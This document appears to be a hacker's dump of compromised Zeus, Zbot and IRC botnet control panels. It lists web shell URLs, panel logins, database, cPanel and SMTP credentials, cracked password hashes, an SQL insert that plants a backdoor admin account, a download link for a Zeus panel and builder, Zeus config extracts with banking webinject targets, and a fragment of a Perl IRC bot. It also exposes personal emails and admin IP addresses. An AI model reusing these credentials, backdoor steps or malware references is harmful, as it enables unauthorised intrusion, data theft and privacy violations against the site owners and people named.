Zeus - ghandigameh.org - Hacked

//shell 
hxxp://www.ghandigameh.org/wkv3.php
passwd : its-ownz

// mysql
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'ghandiga_timbod';
$config['mysql_pass']          = 'cecelle222';
$config['mysql_db']            = 'ghandiga_timbod';
// zeus panel 
hxxp://www.ghandigameh.org/timbod/cp.php
user : its-ownz
pass : 123456

// mysql
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'ghandiga_okpokoa';
$config['mysql_pass']          = 'cecelle222';
$config['mysql_db']            = 'ghandiga_okpokoa';
// zeus panel 
hxxp://www.ghandigameh.org/okpokoa/cp.php
user : its-ownz
pass : 123456


// mysql
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'ghandiga_mumbas';
$config['mysql_pass']          = 'cecelle222';
$config['mysql_db']            = 'ghandiga_mumbas';
// zeus panel 
hxxp://www.ghandigameh.org/mumbas/cp.php
user : its-ownz
pass : 123456

// login was 
admin ip = 41.220.69.209
admin 6a74c2362a925e5dc22f82a285d44aa5 (md5 hash)

// added via mysql thu ..
INSERT INTO `cp_users` ( `id`, `name`, `pass`, `language`, `flag_enabled`, `comment`, `ss_format`, `ss_quality`, `r_edit_bots`, `r_stats_main`, `r_stats_main_reset`, `r_stats_os`, `r_botnet_bots`, `r_botnet_scripts`, `r_botnet_scripts_edit`, `r_reports_db`, `r_reports_db_edit`, `r_reports_files`, `r_reports_files_edit`, `r_reports_jn`, `r_system_info`, `r_system_options`, `r_system_user`, `r_system_users` ) VALUES ( '2', 'its-ownz', 'e10adc3949ba59abbe56e057f20f883e', 'en', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1' );

Zbot - vinltd.com - Hacked

// zeus panel
http://vinltd.com/suz/cp.php 
user : admin 
pass : profyle187

// mysql
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'vinltdco_suz';
$config['mysql_pass']          = 'profyle187';
$config['mysql_db']            = 'vinltdco_suz';

// shell 
hxxp://vinltd.com/info.php
// note account suspended !

Zbot - ns2.ezhost.in - Login

// zeus panel 1
user : admin
pass : london
login : hxxp://ns2.ezhost.in/ca/serverphp/cp.php

// zeus panel 2
user : admin
pass : london
hxxp://ns2.ezhost.in/images/us/serverphp/cp.php

// zeus panel 3
user : admin
pass : london
hxxp://ns2.ezhost.in/images/online/serverphp/cp.php

// php panel 
hxxp://ns2.ezhost.in/ca.zip
hxxp://ns2.ezhost.in/images.zip

NOTE : added a second admin user to all panels 
user : its-ownz
pass : 123456

ZeusBot - newbetrrsearve.co.uk - Hacked

// Panel
hxxp://newbetrrsearve.co.uk/usa/serverphp/cp.php
// login 
user : admin
pass : london 
// have fun

rageBot - 1war.hopto.org - Owned ( lol )

* Connecting to 1war.hopto.org (94.75.255.77) port 6667...
* Connected. Now logging in...
* *** Checking ident...
* *** No ident response; username prefixed with ~
* You have not registered
* Received a CTCP VERSION from IRC
<< 332 [nLh-VNC]szedsp ##vampir## :+scan 60 1 201 -b 3
<< 333 [nLh-VNC]szedsp ##vampir## Vampir 1413995814
<< 353 [nLh-VNC]szedsp @ ##vampir## :[nLh-VNC]szedsp [nLh-VNC]edmhip [nLh-VNC]aueejn [nLh-VNC]zabbni [nLh-VNC]yffqig [nLh-VNC]lrstbw [nLh-VNC]camwpi [nLh-VNC]wikcfh [nLh-VNC]vtsgjy [nLh-VNC]gyryte [nLh-VNC]tkarol [nLh-VNC]pwzrlf +MissaK|NS| [nLh-VNC]idiswr @nitZ [nLh-VNC]hkzqij
<< 366 [nLh-VNC]szedsp ##vampir## :End of /NAMES list.
<< PRIVMSG [nLh-VNC]szedsp :\x01VERSION\x01
>> PRIVMSG ##vampir## :\x02[RAGE SCAN:]\x02 range: 201/60 threads.

Zeus Botnet - 46.22.173.133 - Owned

hxxp://46.22.173.133/boom/cp.php?letter=home
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'root';
$config['mysql_pass']          = 'thanks22';
$config['mysql_db']            = 'prince';

$config['reports_path']        = '_fe
we are in 

// prince 
admin 607cbd481652995c869ca3d08252df0e = favour123
// doom
admin   0192023a7bbd73250516f069df18b500 = admin123

// zeus panel + builder found at his pc

hxxp://www.datafilehost.com/d/863b03f7
pass : itsownz

// malware 

c5b2ef451c3fc351401f07d12b48240a md5 hash 
serach at malwr.com

// extraced from Xylitol thanks

Malware family    ZEUS
MD5    0b68b3c971fb4109094b1437e15e258b
Version    2.1.0.1
RC4 Keystream    bdd55760218b4d697d5681297c15a928758e7619368c05544a1bfd077722ce31adb10e3b41df0861a8503045272e7fcf55bec623fb9d6df49e10ea7109b22c43b5682b639f3549a66f5aae3d5eedaa665cbf9a33975317a0c9a1d103da674613d2f8007a396e9cc2920f93b3fe940a89146bdca391983a424e590174b8eec0efa4baff3ec5e0f7e3cdab1c122db4dd0b485d0ce6378734858a3f0d52d9c872e244e47bf6e95196cc1124c4bbc16aec73fceb831fe1866c2fb726d316d6af4c474088c78499f52ad74fb6701ed4a2f120b9588dd05b8f62ca3cde6506789b804ba51dcbf2e8c379381a5f02e5f9f318f0320425e7d8b07efa8295bcdb9064a7ac
gate.php URLs    

    hxxp://46.22.173.133/prince/secure.php

URLs    

    hxxp://46.22.173.133/prince/config.bin

Zeus Bot - cmbonline.in - Hacked

config.php

http://cmbonline.in/
// login 
// user : admin2
// pass : admin
hxxp://cmbonline.in/wp-admin/css/colors/admin1/cp.php

// shell 
hxxp://cmbonline.in/wp-admin/css/colors/admin1/install/info.php

// other bots found from that 
user=admin
pass=ENUGU042

hxxp://coco-bomgo.ru/wordpress/wp-admin/images/admin2/php/cp.php?m=login
hxxp://www.ostarinduztry.com/wp-includes/ID3/larger/php/cp.php?m=login
// have fun 

Some Perl Bots !!

 http://pastebin.com/nZ3bVpRL 
http://pastebin.com/YMycf3M9
http://pastebin.com/YXue9AaS

Zeus - danbeta.ru - Owned

// shell 
http://danbeta.ru/tools/test.php 
// database
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'atbdmyas_g11';
$config['mysql_pass']          = 'bobychenko123';
$config['mysql_db']            = 'atbdmyas_g11';

// http://danbeta.ru/g1/cp.php
admin eb87eddd58fed286c508db92d0fe4808 MD5 : omwengho123
// http://danbeta.ru/g2/cp.php
admin   e10adc3949ba59abbe56e057f20f883e MD5 : 123456
// http://danbeta.ru/g5/cp.php
admin   18365e47dd8d8ca5ac6b40e3cd8fbd52 MD5 : lucky2014

// Admin ip 
212.215.228.143 - - [07/Oct/2014:23:40:48 -0400] "GET /g5/cp.php?m=login HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0"
49.125.235.3 - - [07/Oct/2014:23:41:14 -0400] "GET /g5/cp.php?m=login HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko

[client] cpanel / 
password=lYm4d9h0K  /
user=atbdmyas
ssh key : QulzAs#Tc^Ut

Zeus Bot - icbcasia.info - Exposed

 // Thanks to Xilytol 
Malware family    ZEUS
MD5    6256b5aaad73fa043223ea681bbce823
Version    2.1.0.1
RC4 Keystream 650839bd99761a57d4a87289cf4e0254d852d320cd50c9fee3498e30f5fba
e7129a641833a91be61b14d9492d78d1573002b9b680d7a48d0a43b1f0a70381bce8747457b
2fe18c56148804b0c5a5f7c444320b58177d03db3f95b83eea2882ed339c6bd14a7f249dd66
f3578deb546af6326e734a1b3c055eba28bbafc2e1305539f6642b6adffbb22606a80ee75d9
9027fa4b194ff1ec59ca6d69f89a1c2d3db29ed2817c6ee2f2c8c1c6255eda6c93a097fde05db
72a4cbc74c7a7101ef6f0980fe411b4b98636621d640cdcf4967e6779f351f931e52101e6d58a
c2aa2c07e8cb16bfab3c848506ef40cc77dd4323185ce937a95a8f125f090e5bdfa3c3ac
gate.php URLs
    hxxp://icbcasia.info/7/serverphp/gate.php
URLs
    hxxp://icbcasia.info/7/serverphp/cfg.bin
Webinjects
    hxxps://www.ccm.es/cgi-bin/INclient_6105
    hxxps://www.caja-granada.es/cgi-bin/INclient_2031
    hxxps://home.ybonline.co.uk/login.html*
    hxxps://www.nwolb.com/Login.aspx*
    hxxps://online-business.lloydstsb.co.uk/customer.ibc
    hxxps://online-offshore.lloydstsb.com/customer.ibc
    hxxp://www.hsbc.co.uk/1/2/personal/internet-banking*
    hxxps://www.dab-bank.com*
    hxxps://probanking.procreditbank.bg/main/main.asp*
    hxxps://www.citibank.de*
    hxxps://ibank.barclays.co.uk/olb/x/LoginMember.do
hxxps://ibank.internationalbanking.barclays.com/logon/icebapplication*
    hxxp://caixasabadell.net/banca2/tx0011/0011.jsp
    hxxp://*.osmp.ru/
    hxxps://www.sabadellatlantico.com/es/*
    hxxps://oi.cajamadrid.es/CajaMadrid/oi/pt_oi/Login/login
    hxxps://www.caixagirona.es/cgi-bin/INclient_2030*
    hxxps://www.unicaja.es/PortalServlet*
    hxxps://areasegura.banif.es/bog/bogbsn*
    hxxps://www.bgnetplus.com/niloinet/login.jsp
    hxxps://www.caixalaietana.es/cgi-bin/INclient_2042
    hxxps://www.cajacirculo.es/ISMC/Circulo/acceso.jsp
    hxxps://www.cajabadajoz.es/cgi-bin/INclient_6010*
    hxxps://extranet.banesto.es/npage/OtrosLogin/LoginIBanesto.htm
    hxxps://www.e-gold.com/acct/li.asp
    hxxps://www.fibancmediolanum.es/BasePage.aspx*
    hxxps://online.wellsfargo.com/das/cgi-bin/session.cgi*
    hxxps://www.wellsfargo.com/*
    */my.ebay.com/*CurrentPage=MyeBayPersonalInfo*
    *.ebay.com/*eBayISAPI.dll?*
    hxxps://www.us.hsbc.com/*
    hxxps://home.cbonline.co.uk/login.html*
    hxxps://welcome27.co-operativebank.co.uk/CBIBSWeb/start.do
    hxxps://welcome23.smile.co.uk/SmileWeb/start.do
    hxxps://www.halifax-online.co.uk/_mem_bin/formslogin.asp*
    hxxps://online.wellsfargo.com/login*
    hxxps://online.wellsfargo.com/signon*
    hxxps://www.e-gold.com/acct/balance.asp*
hxxps://intelvia.cajamurcia.es/2043/entrada/01entradaencrip.htm
    hxxps://banca.cajaen.es/Jaen/INclient.jsp
    hxxps://www.cajavital.es/Appserver/vitalnet*
    hxxps://www.caixaontinyent.es/cgi-bin/INclient_2045
hxxps://web.da-us.citibank.com/cgi-bin/citifi/portal/l/autherror.do*
    hxxps://www.cajacanarias.es/cgi-bin/INclient_6065
    hxxps://montevia.elmonte.es/cgi-bin/INclient_2098*
    hxxps://www.gruppocarige.it/grps/vbank/jsp/login.jsp
hxxps://oie.cajamadridempresas.es/CajaMadrid/oie/pt_oie/Login/login_oie_1
hxxps://privati.internetbanking.bancaintesa.it/sm/login/IN/box_login.jsp
hxxps://bancopostaonline.poste.it/bpol/bancoposta/formslogin.asp
    hxxps://www.iwbank.it/private/index_pub.jhtml*
    hxxps://hb.quiubi.it/newSSO/x11logon.htm
    hxxps://www.isideonline.it/relaxbanking/sso.Login*
    hxxps://web.secservizi.it/siteminderagent/forms/login.fcc
    hxxps://rupay.com/index.php
    hxxps://www.53.com/servlet/efsonline/index.html*
    hxxps://www.suntrust.com/portal/server.pt*parentname=Login*
hxxps://onlinebanking.nationalcity.com/OLB/secure/AccountList.aspx
    hxxps://www#.citizensbankonline.com/*/index-wait.jsp
hxxps://easyweb*.tdcanadatrust.com/servlet/*FinancialSummaryServlet*
    hxxps://www#.usbank.com/internetBanking/LoginRouter
    hxxps://www.paypal.com/*/webscr?cmd=_login-done*
    hxxps://www.paypal.com/*/webscr?cmd=_account
    hxxps://www.clavenet.net/cgi-bin/INclient_7054
    hxxps://www.cajasoldirecto.es/2106/*
    hxxps://www.cajalaboral.com/home/acceso.asp
    hxxps://carnet.cajarioja.es/banca3/tx0011/0011.jsp
    hxxps://www.caixatarragona.es/esp/sec_1/oficinacodigo.jsp
    hxxps://www.cajadeavila.es/cgi-bin/INclient_6094
hxxps://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome
    hxxps://web.da-us.citibank.com/*BS_Id=MemberHomepage*
    *banquepopulaire.fr/*
    hxxps://light.webmoney.ru/default.aspx
    hxxps://www.isbank.com.tr/Internet/ControlLoader.aspx*
    hxxps://light.webmoney.ru/default.aspx
    *wellsfargo.com/*
    hxxps://online*.lloydstsb.co.uk/logon.ibc
    hxxps://home.ybonline.co.uk/ral/loginmgr/*
    hxxps://www.mybank.alliance-leicester.co.uk/login/*
    hxxps://www.ebank.hsbc.co.uk/main/IBLogon.jsp
    hxxps://scrigno.popso.it*
    hxxps://www.halifax-online.co.uk/MyAccounts/MyAccounts.aspx*
    hxxps://ibank.barclays.co.uk/olb/x/LoginMember.do
    hxxps://www.halifax-online.co.uk/_mem_bin/*
    hxxps://resources.chase.com/MyAccounts.aspx
    hxxps://bancaonline.openbank.es/servlet/PProxy?*
hxxps://online.wamu.com/Servicing/Servicing.aspx?targetPage=AccountSummary
hxxps://onlinebanking#.wachovia.com/myAccounts.aspx?referrer=authService
hxxps://empresas.gruposantander.es/WebEmpresas/servlet/webempresas.servlets.*
    hxxps://www.gruposantander.es/bog/sbi*?ptns=acceso*
    hxxps://extranet.banesto.es/*/loginParticulares.htm
    hxxps://banesnet.banesto.es/*/loginEmpresas.htm
    hxxps://web.da-us.citibank.com/cgi-bin/citifi/portal/l/l.do
    hxxps://www2.bancopopular.es/AppBPE/servlet/servin*
hxxps://www.bbvanetoffice.com/local_bdno/login_bbvanetoffice.html
    hxxps://www.bancajaproximaempresas.com/ControlEmpresas*
hxxps://home2ae.cd.citibank.ae/CappWebAppAE/producttwo/capp/action/signoncq.do
    hxxps://www.nwolb.com/Login.asp*
    hxxps://lot-port.bcs.ru/names.nsf?#ogin*
    hxxps://www.bancoherrero.com/es/*
    hxxps://pastornetparticulares.bancopastor.es/SrPd*
    hxxps://internetbanking.aib.ie/hb1/roi/signon
    hxxps://www.uno-e.com/local_bdnt_unoe/Login_unoe2.html
    hxxps://olb2.nationet.com/signon/signon*
    hxxps://banking*.anz.com/*
    hxxps://www.rbsdigital.com/Login.asp*
    *//mail.yandex.ru/
    *//mail.yandex.ru/index.xml
    *//money.yandex.ru/
    *//money.yandex.ru/index.xml
    hxxps://cardsonline-consumer.com/RBSG_Consumer/VerifyLogin.do
    hxxps://www*.banking.first-direct.com/1/2/*
    hxxps://olb2.nationet.com/MyAccounts/frame_MyAccounts_WP2.asp*

1k Perl Bot - 94.102.63.238 -

 // botnet soruce ( for Full source comment ) 
my $linas_max='2';
my $sleep='5';
my @adms=("X", "Y");
my @hostauth=("localhost");
my @canais=("#new");
my $nick='PHP';
my $ircname ='PHP';
chop (my $realname = `uname -sr`);
$servidor='94.102.63.238' unless $servidor;
my $porta='443';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="'/usr/sbin/apache/log'�"x16;

 * Connecting to 94.102.63.238 port 443...
* There are 1 users and 1097 invisible on 1 servers
* 1 :operator(s) online
* 25 :unknown connection(s)
* 5 :channels formed
* I have 1098 clients and 0 servers
* 1098 4012 :Current local users 1098, max 4012
* 1098 1112 :Current global users 1098, max 1112

 * Nmap scan report for hosted-for-minecraft.net (94.102.63.238)
Host is up (0.071s latency).
Not shown: 995 closed ports
PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH 5.9p1 Debian 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f5:c1:7e:70:09:2d:c2:41:fa:67:f4:2a:7e:50:1a:f0 (DSA)
|   2048 8c:d7:ca:73:31:c3:47:b3:54:70:27:be:ec:5c:70:91 (RSA)
|_  256 58:d3:27:7a:7b:1a:1b:56:8c:2a:07:42:e1:24:91:90 (ECDSA)
25/tcp  filtered smtp
80/tcp  open     http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
135/tcp filtered msrpc
443/tcp open     irc     Unreal ircd
| irc-info: 
|   server: irc.foonet.com
|   version: Unreal3.2.10.1. irc.foonet.com 
|   servers: 1
|   ops: 1
|   chans: 5
|   users: 1100
|   lservers: 0
|   lusers: 1100
|   uptime: 0 days, 18:06:24
|   source host: 7DE75DA1.C67917B8.7CED0DBF.IP
|_  source ident: nmap
Service Info: Host: irc.foonet.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel

NetRange:       94.0.0.0 - 94.255.255.255
CIDR:           94.0.0.0/8
OriginAS:       
NetName:        94-RIPE
NetHandle:      NET-94-0-0-0-1
Parent:         
NetType:        Allocated to RIPE NCC
Comment:        These addresses have been further assigned to users in
Comment:        the RIPE NCC region. Contact information can be found in
Comment:        the RIPE database at http://www.ripe.net/whois
RegDate:        2007-07-30
Updated:        2009-05-18
Ref:            http://whois.arin.net/rest/net/NET-94-0-0-0-1

OrgName:        RIPE Network Coordination Centre
OrgId:          RIPE
Address:        P.O. Box 10096
City:           Amsterdam
StateProv:      
PostalCode:     1001EB
Country:        NL
RegDate:        
Updated:        2013-07-29
Ref:            http://whois.arin.net/rest/org/RIPE

ReferralServer: whois://whois.ripe.net:43

OrgTechHandle: RNO29-ARIN
OrgTechName:   RIPE NCC Operations
OrgTechPhone:  +31 20 535 4444 
OrgTechEmail:  hostmaster@ripe.net
OrgTechRef:    http://whois.arin.net/rest/poc/RNO29-ARIN

OrgAbuseHandle: ABUSE3850-ARIN
OrgAbuseName:   Abuse Contact
OrgAbusePhone:  +31205354444 
OrgAbuseEmail:  abuse@ripe.net
OrgAbuseRef:    http://whois.arin.net/rest/poc/ABUSE3850-ARIN

Video - Owning pBot - Server

Some kids run pBot and Unrealircd on some vuln/hijacked server :P

Owned - Malware - www.bravo-archiv.de

http://pedump.me/dcc343d52fe7a8fa6ce44b0a56d5481d/#info

Malware hosted on FlinkISO server - www.flinkiso.com

// Link 
http://www.flinkiso.com/
http://www.flinkiso.com/phpinfo.php
// Admins
Super User - flinkadmin - administrator@flinkiso.com - 
7bea0b406bc7d4fdca4dcdbfcb1f5eb2:H5BibKf5lSMWLu1K6FHVwIqvVGEwhUFE
Super User - admin - mayureshvaidya@gmail.com - 4df7fd11965981a9d5589689327313da:2Ey844V7o28nTgqTvFo1o23QohMOhiGl
// Admin Path
http://www.flinkiso.com/administrator/
// Configuration.php
class JConfig {
 public $offline = '0';
 public $offline_message = 'This site is down for maintenance.
 We are working on further enhancing your experience. Please check back again soon.';
 public $display_offline_message = '1';
 public $offline_image = '';
 public $sitename = 'www.flinkiso.com';
 public $editor = 'none';
 public $captcha = '0';
 public $list_limit = '20';
 public $access = '4';
 public $debug = '0';
 public $debug_lang = '0';
 public $dbtype = 'mysql';
 public $host = 'localhost';
 public $user = 'root';
 public $password = '';
 public $db = 'flinkisobeta';
 public $dbprefix = 'm5b0z_';
 public $live_site = '';
 public $secret = '0gAFlfZPMYlfMfEQ';
 public $gzip = '1';
 public $error_reporting = 'none';
 public $helpurl = 'http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}';
 public $ftp_host = '127.0.0.1';
 public $ftp_port = '21';
 public $ftp_user = '';
 public $ftp_pass = '';
 public $ftp_root = '';
 public $ftp_enable = '0';
 public $offset = 'Asia/Kolkata';
 public $mailer = 'mail';
 public $mailfrom = 'contact@flinkiso.com';
 public $fromname = 'www.flinkiso.com';
 public $sendmail = '/usr/sbin/sendmail';
 public $smtpauth = '0';
 public $smtpuser = 'contact@flinkiso.com';
 public $smtppass = 'Flinkiso@004';
 public $smtphost = 'flinkiso.com';
 public $smtpsecure = 'none';
 public $smtpport = '25';
 public $caching = '0';
 public $cache_handler = 'file';
 public $cachetime = '15';
 public $MetaDesc = '';
 public $MetaKeys = '';

Hacked - 120.63.157.195 - Zeus Bot

 

 

// Zeus Malware 
hxxps://zeustracker.abuse.ch/monitor.php?host=120.63.157.195
// Control Panel 
http://120.63.157.195:8080/webalizer/lampp/papaclick.php
user: admin
pass: admin88